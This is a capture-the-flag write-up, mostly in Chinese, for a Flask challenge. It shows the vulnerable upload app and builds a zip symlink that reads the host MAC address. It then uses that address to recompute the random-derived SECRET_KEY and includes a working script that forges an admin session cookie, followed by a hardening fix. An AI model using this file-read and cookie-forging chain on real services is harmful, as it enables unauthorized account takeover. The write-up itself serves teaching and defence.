buu-awdp


babypython

考点：利用 zip 中的软链接读取主机 MAC 地址，得到 random 的种子后重算 SECRET_KEY，伪造 admin 的 session

# -*- coding: utf-8 -*-
from flask import Flask,session,render_template,redirect, url_for, escape, request,Response
import uuid
import base64
import random
import secret
from werkzeug.utils import secure_filename
import os
# NOTE(review): uuid.getnode() is the host's MAC address as a 48-bit integer.
# That value is not a secret (it is readable from /sys/class/net/<iface>/address,
# which the upload handler below lets a client read through a symlink), and the
# Mersenne Twister behind `random` is not a CSPRNG, so everything drawn from it
# is reproducible by anyone who learns the MAC.
random.seed(uuid.getnode())
app = Flask(__name__)
# Session-signing key = first draw from the predictable generator above, so a
# forged session cookie needs nothing more than the MAC (see the forging script).
app.config['SECRET_KEY'] = str(random.random()*100)
app.config['UPLOAD_FOLDER'] = './uploads'
app.config['MAX_CONTENT_LENGTH'] = 100 * 1024  # 100 KiB request-body cap enforced by Flask
ALLOWED_EXTENSIONS = set(['zip'])  # extension allow-list only; archive contents are never inspected

def allowed_file(filename):
    """Return True when *filename* ends in an extension from ALLOWED_EXTENSIONS.

    The check is case-insensitive and looks only at the text after the last
    dot; nothing about the file's actual content is verified, so a "zip" here
    means "named like a zip", not "a safe zip".
    """
    if '.' not in filename:
        return False
    extension = filename.rsplit('.', 1)[1].lower()
    return extension in ALLOWED_EXTENSIONS


@app.route('/', methods=['GET'])
def index():
    """Render the landing page for the current session identity.

    ``?error=1`` is the "forbidden" path (the upload handler redirects here
    when extracted content contains "flag"): the session identity is dropped
    and the template gets ``forbidden=1``. Any other visit without a session
    identity is given ``username="guest"``.

    Note that ``secret.secret`` is handed to the template for every visitor,
    guest included; any admin-only gating presumably lives in index.html,
    which is not visible here.
    """
    if request.args.get('error', '') == '1':
        session.pop('username', None)
        return render_template('index.html', forbidden=1)

    # From here on the session always carries a username, which is why the
    # original's "no username" fallback branch could never run.
    if 'username' not in session:
        session['username'] = "guest"
    return render_template('index.html',
                           user=session['username'],
                           secret=secret.secret)


@app.route('/upload', methods=['POST'])
def upload_file():
    """Accept a .zip upload, extract it, return the extracted text, clean up.

    This is the arbitrary-file-read primitive the writeup uses: ``unzip``
    recreates symlink members as symlinks and ``cat`` then follows them, so an
    archive holding a symlink to /sys/class/net/eth0/address (or any other
    readable host file) echoes that file back in the response.

    Returns:
        A redirect to ``index`` when the field is missing/empty, or
        ``index?error=1`` when the extracted text contains "flag"; a plain
        string for a name clash or a non-.zip name; otherwise a ``Response``
        whose body is the concatenated extracted files (empty on failure).
    """
    if 'the_file' not in request.files:
        return redirect(url_for('index'))
    file = request.files['the_file']  # name is reused below for the extracted text
    if file.filename == '':
        return redirect(url_for('index'))
    if file and allowed_file(file.filename):
        # secure_filename() reduces the client name to a plain basename (ASCII
        # letters, digits, "_.-" per werkzeug; confirm against the installed
        # version). That sanitisation is the only thing keeping the
        # string-built shell commands below free of injection.
        filename = secure_filename(file.filename)
        file_save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
        if(os.path.exists(file_save_path)):
            return 'This file already exists'
        file.save(file_save_path)
    else:
        return 'This file is not a zipfile'  # extension check only (see allowed_file)


    try:
        extract_path = file_save_path + '_'
        # -n never overwrites; symlink members are recreated as symlinks,
        # nothing rejects them or checks where they point.
        os.system('unzip -n ' + file_save_path + ' -d '+ extract_path)
        # Shell glob + cat follows those symlinks => read of any file the
        # service user can open.
        read_obj = os.popen('cat ' + extract_path + '/*')
        file = read_obj.read()
        read_obj.close()
        os.system('rm -rf ' + extract_path)
    except Exception as e:
        # os.system()/os.popen() do not raise on a non-zero exit status, so
        # this branch is rarely reached; when it is, the response is empty.
        file = None

    os.remove(file_save_path)
    if(file != None):
        # 'ZmxhZw==' is base64 for "flag": a substring denylist on the output.
        # It stops reading the flag file directly but nothing else, e.g. the
        # MAC address that seeds SECRET_KEY. Matching also clears the session
        # via the ?error=1 path in index().
        if(file.find(base64.b64decode('ZmxhZw==').decode('utf-8')) != -1):
            return redirect(url_for('index', error=1))
    return Response(file)


if __name__ == '__main__':
    # Loopback only, and the Werkzeug debugger stays off: debug=True would
    # expose an interactive console on any unhandled exception.
    app.run(host='127.0.0.1', port=10008, debug=False)

image-20251212213554833

结合代码，显然要伪造 admin 的 session。SECRET_KEY 由 random.random() 生成，而种子是 uuid.getnode()——它返回当前主机 MAC 地址对应的 48 位整数，并不是秘密。上传接口用 unzip 解压后直接 cat 解压出的文件，而 unzip 会原样还原压缩包里的软链接，所以打包一个指向 /sys/class/net/eth0/address 的软链接就能读出 MAC 地址（容器里通常只有 eth0，若算出的 key 不对可换成 /sys/class/net/ 下的其他接口）。注意不能直接链接 flag 文件：响应里含有 "flag" 字符串时会被重定向到 ?error=1。

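# Point at the interface uuid.getnode() reads; eth0 is the usual single
# interface inside a container. -f lets the command be re-run if `link`
# already exists from a previous attempt.
ln -sf /sys/class/net/eth0/address link
# --symlinks stores the link itself instead of the file it points to, so
# the server-side `unzip` recreates the symlink and `cat` follows it.
zip --symlinks link.zip link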

得到 36:28:50:90:bb:2f。去掉冒号按十六进制转成整数（这正是 uuid.getnode() 的返回值）作为种子，重新算出 SECRET_KEY，用它签发 username=admin 的 session cookie，替换浏览器里的 session 后访问 / 即可得到 flag。


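import random

# MAC address recovered from /sys/class/net/eth0/address through the symlink
# upload. uuid.getnode() on the target returns exactly this value as a 48-bit
# integer, which is what the app seeds `random` with.
MAC = "36:28:50:90:bb:2f"


def mac_to_seed(mac):
    """Convert a colon- or dash-separated MAC string to the int uuid.getnode() returns.

    Raises:
        ValueError: if *mac* does not hold exactly 12 hex digits.
    """
    digits = mac.replace(":", "").replace("-", "")
    if len(digits) != 12:
        raise ValueError("expected a 48-bit MAC address, got %r" % (mac,))
    return int(digits, 16)


def derive_secret_key(mac):
    """Recompute the target's SECRET_KEY: str(random.random()*100) after seeding with the MAC.

    A private random.Random instance is used rather than re-seeding the global
    generator; both go through the same Mersenne Twister seeding, so the first
    draw is identical to what the server produced.
    """
    rng = random.Random(mac_to_seed(mac))
    return str(rng.random() * 100)


def session_serializer(secret_key):
    """Build the signing serializer Flask uses for its session cookie, keyed with *secret_key*.

    Flask is imported here so the pure computation above stays usable without it.
    """
    from flask import Flask
    from flask.sessions import SecureCookieSessionInterface
    app = Flask(__name__)
    app.secret_key = secret_key
    return SecureCookieSessionInterface().get_signing_serializer(app)


if __name__ == "__main__":
    key = derive_secret_key(MAC)
    print(key)
    serializer = session_serializer(key)
    data = {
        'username': "admin"
    }
    # Sign the session payload; paste the result as the `session` cookie.
    serialized = serializer.dumps(data)
    print("Encoded session:", serialized)
    # Round-trip check: a failure here means the local Flask/itsdangerous
    # signs differently from what was expected.
    decoded = serializer.loads(serialized)
    print("Decoded session:", decoded)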

加固就是用 secrets 模块生成 SECRET_KEY：secrets 使用操作系统的 CSPRNG，种子不可预测。注意要用 secrets.token_hex()（32 字节即 256 位）而不是 secrets.randbelow(10000000000)——后者只有约 33 位熵，拿到一个签名后的 cookie 就能离线爆破出 key。另外这只堵住了伪造 session 这一条路，软链接任意文件读仍然存在；AWDP 里最好同时在解压时拒绝软链接成员。

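import secrets

# Session-signing key from the OS CSPRNG: token_hex(32) is 256 bits of entropy.
# str(secrets.randbelow(10000000000)) would be unpredictable but tiny — under
# 2**34, so about 33 bits — and an attacker holding one signed session cookie
# can brute-force that offline. The key is generated at import time, so a
# multi-process deployment must share it (e.g. via environment/config) or
# sessions will not validate across workers.
app.config['SECRET_KEY'] = secrets.token_hex(32)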
谢谢观看